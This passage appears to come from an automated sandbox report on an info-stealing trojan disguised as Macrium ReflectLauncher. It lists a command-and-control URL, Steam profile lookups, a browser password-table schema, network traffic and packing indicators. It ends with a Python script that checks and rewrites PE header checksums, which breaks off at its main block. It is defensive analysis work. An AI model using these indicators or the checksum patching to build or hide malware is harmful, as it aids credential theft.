00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2266425241.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api298
                    Source: BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api:u
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apif
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apila
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apilaV
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/s&
                    Source: BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/s6
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/~
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BnJxmraqlk.exe | String found in binary or memory: https://updates.macrium.com/reflect/blank.asphttp:https://updates.macrium.com/InternetConnectionTime
Source: BnJxmraqlk.exe | String found in binary or memory: https://updates.macrium.com/reflect/v8/languages/get.asp?lang=%s&major=%d&minor=%d&build=%dhttp:http
Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: BnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: BnJxmraqlk.exe | Static PE information: invalid certificate
Source: BnJxmraqlk.exe, 00000000.00000002.2349737464.00000000003C2000.00000080.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameReflectLauncher.exe@ vs BnJxmraqlk.exe
Source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002ECD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs BnJxmraqlk.exe
Source: BnJxmraqlk.exe | Binary or memory string: OriginalFilenameReflectLauncher.exe@ vs BnJxmraqlk.exe
Source: BnJxmraqlk.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BnJxmraqlk.exe | Static PE information: Section: pbpvjmsi ZLIB complexity 1.021484375
Source: BnJxmraqlk.exe | Binary string: RAW IDENTIFY DEVICE DATAForceEFISettingsSYSTEM\CurrentControlSet\Control\hivelistBCD0000\efi\system\setupSystemPartitionc:\\DEVICE\H\\\\?\GLOBALROOT\Device\Harddisk%d\Partition%d\HiberbootEnabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerHiberbootEnabledHiberbootDisabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerSoftware\Macrium\Reflect\MIGHiberbootDisabledSOFTWARE\Macrium\Reflect\MIG\StoppedUntilRebootSoftware\Macrium\Reflect\MIGHiberbootEnabledSYSTEM\CurrentControlSet\Control\Session Manager\PowerHiberbootDisabledSoftware\Macrium\Reflect\MIG\%s\drivers\%sreflect.exe_recover_recoverMacriumRebootScheduledkernel32.dllGetProductInfomsinfo32C:\Program Files\Common Files\Microsoft Shared\MsInfo\msinfo32.exe"%s" /nfo "%s"S-1-5-18S-1-5-32-544...Macrium ReflectChanged Block Tracker{452C9F12-83F1-4F22-985B-FDB3C8ABD471}{452C9F12-83F1-4F22-985B-FDB3C8ABD471}{0A68F3F8-73C5-40B6-B57E-AA69683767D0}viBootviBoot{452C9F12-83F1-4F22-985B-FDB3C8ABD590}CBT{F4E99D38-AEE7-4E4E-93D1-6C2094FFA565}MIGImage Guardianv%d.%d.%ddrivers\mrcbt.sys{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}{BA595DA9-69FB-420A-958A-F71880A1D09B}drivers\mrigflt.sysCBT{BA595DA9-69FB-420A-958A-F71880A1D09B}CBT{FEE007F1-8256-4305-A80E-9EDA1D35D2E6}\\.\C:CBTTESTSettingsCBTTESTSettingsFailedCBTTESTFailedCBTTESTV7EnableCBTSettingsV7EnableCBTSettingsMrcbt.sys\\\?\??\\\.\%C:ImagePathSYSTEM\CurrentControlSet\Services\MRCBTsystem32\drivers\mrcbt.sysStartdriversmrcbt.sys\%hu.%hu.%hu\\.\C:%lu.%lu.%lumrcbt.sysSYSTEM\CurrentControlSet\Services\MRCBTdrivers\\\.\C:UpperFiltersSOFTWARE\Macrium\Reflect\CBT\SequencemrcbtSOFTWARE\Macrium\Reflect\CBT\SequencevolsnapmrcbtUpperFiltersDebugLogSystem\CurrentControlSet\Services\mrcbtDebugLogDebugLogDebugLogPath\??\%PROGRAMDATA%\Macrium\mrcbt_debug.log\??\DebugLogPathError generating user tokenError duplicating user token
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
Source: BnJxmraqlk.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BnJxmraqlk.exe, 00000000.00000003.2202226133.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2255694526.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2202067915.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2255574030.0000000003C55000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BnJxmraqlk.exe | Virustotal: Detection: 33%
Source: BnJxmraqlk.exe | ReversingLabs: Detection: 31%
Source: BnJxmraqlk.exe | String found in binary or memory: ENTRY54IsParentProcessTaskSchedulere:\release-reflect-8\image\reflectlauncher\reflectlauncher.cppexplorer.exesvchost.exetaskeng.exedllhost.exeParent process is a scheduled task.Parent process is not a scheduled task.66EXIT68Launching process via the service.77LaunchBackupViaService -lfs -tsReflectService launched reflectbin.exe.109ReflectService did not return a success status, see service logs, status = [%d].118Could not message the service, to request a ReflectBackup launch.124Ensure that the Macrium Reflect Service is configured to auto-start and is running.125To fix this, run Macrium Reflect interactively and this will configure the Macrium Reflect Service.126Reflect backup launched by SYSTEM.136LaunchBackupViaCreateProcess140reflectbin.exe failed signature check.Launched reflectbin.exe.155161reflectbin could not be started.Launching process via ShellExecute.171LaunchBackupViaShellExecute175189196ReflectBackup could not be started.Waiting for reflectbin.exe to finish executing.208WaitForReflectProcessToExit230Could not get exit code for ReflectBin.exe.Could not wait for reflectbin.exe243"\reflectbin.exe"\reflect.exeReflect Launcher is running as [%s].328IsSystemAccountS-1-5-18SOFTWARE\Macrium\Reflect LauncherReflect Launcher354wWinMain -noconsoleLaunch reflectbin.exe [%s].369UseServiceToLaunchReflectBackupAllowUACByPasslaunching processes normally.382Either OS is Windows 10AU+, or the process does not have admin rights.389 -g.xml-e Either OS is pre Windows 10AU, or the process already has admin rights.399Always using service to launch processes.404417Could not attach to parent console.wCONOUT$Not authorised
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File read: C:\Users\user\Desktop\BnJxmraqlk.exe
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Section loaded: profapi.dll
Source: BnJxmraqlk.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: BnJxmraqlk.exe | Static file information: File size 3972448 > 1048576
Source: BnJxmraqlk.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x184a00
Source: BnJxmraqlk.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: BnJxmraqlk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: E:\release-reflect-8\release\x86\working\reflect.pdb source: BnJxmraqlk.exe
                    Source: Binary string: wntdll.pdbUGP source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Unpacked PE file: 0.2.BnJxmraqlk.exe.1c0000.0.unpack
Source: BnJxmraqlk.exe | Static PE information: real checksum: 0x3d85d6 should be: 0x3d0d5d
Source: BnJxmraqlk.exe | Static PE information: section name: pbpvjmsi
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C1CF61 push ss; ret 0_3_03C1CF62
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C206FB push es; retn 0003h 0_3_03C206FE
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C20601 push es; retn 0003h 0_3_03C20602
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C20E01 push cs; retn 0003h 0_3_03C20E02
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C1B30A push ecx; retf 0_3_03C1B310
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C1CD23 push ss; ret 0_3_03C1CD2A
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_03C25628 push esi; retn 0003h 0_3_03C2563E
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Code function: 0_3_00F26D68 pushfd ; retf 0_3_00F26D72
Source: BnJxmraqlk.exe | Static PE information: section name: .text entropy: 7.07184336786379
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Process information set: NOOPENFILEERRORBOX
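The "real checksum ... should be" line in this section is the comparison between the value stored in OptionalHeader.CheckSum and the value Windows would compute for the file on disk; a mismatch on a user-mode executable does not stop it loading (the loader only enforces the field for drivers and boot-time images), so the sandbox reports it as a modification indicator, which fits the unpacking and the Macrium ReflectLauncher.exe OriginalFilename seen elsewhere in the report. The following script is an added example, not Joe Sandbox or Macrium code. It implements the documented Windows checksum (32-bit word sum with end-around carry, the CheckSum dword itself skipped, folded to 16 bits, plus the file length) and checks it against the header of any PE32/PE32+ file; the minimal PE skeleton it builds for a stand-alone run is constructed and not loadable.

```python
"""Recompute OptionalHeader.CheckSum for a PE image and compare it with the
stored value (added example; the algorithm matches CheckSumMappedFile)."""
import struct
import sys


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum. The field sits 0x40 bytes into the
    optional header for both PE32 and PE32+, which follows the 4-byte PE
    signature and the 20-byte IMAGE_FILE_HEADER at e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 0x40


def compute_checksum(data: bytes, field_off: int) -> int:
    """Windows PE checksum over data, ignoring the dword at field_off."""
    pad = (4 - len(data) % 4) % 4
    padded = data + b"\0" * pad
    skip = field_off & ~3
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:                       # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)       # fold to 16 bits
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF        # length of the unpadded file


def verify(data: bytes) -> dict:
    """Stored vs. computed checksum. 0 means the linker or packer never set one;
    a non-zero mismatch is a tamper/packing indicator, not a load failure."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    actual = compute_checksum(data, off)
    status = "unset" if stored == 0 else ("ok" if stored == actual else "mismatch")
    return {"stored": stored, "actual": actual, "status": status}


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with the correct CheckSum written into the header."""
    off = checksum_field_offset(data)
    patched = bytearray(data)
    struct.pack_into("<I", patched, off, compute_checksum(data, off))
    return bytes(patched)


def build_minimal_pe(stored: int) -> bytes:
    """Constructed, non-loadable PE32 skeleton used as sample input: MZ header
    with e_lfanew=0x40, PE signature, IMAGE_FILE_HEADER, a 224-byte optional
    header carrying `stored` as CheckSum, and 64 bytes of filler."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 0x40, stored)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + b"\xCC" * 64


if __name__ == "__main__":
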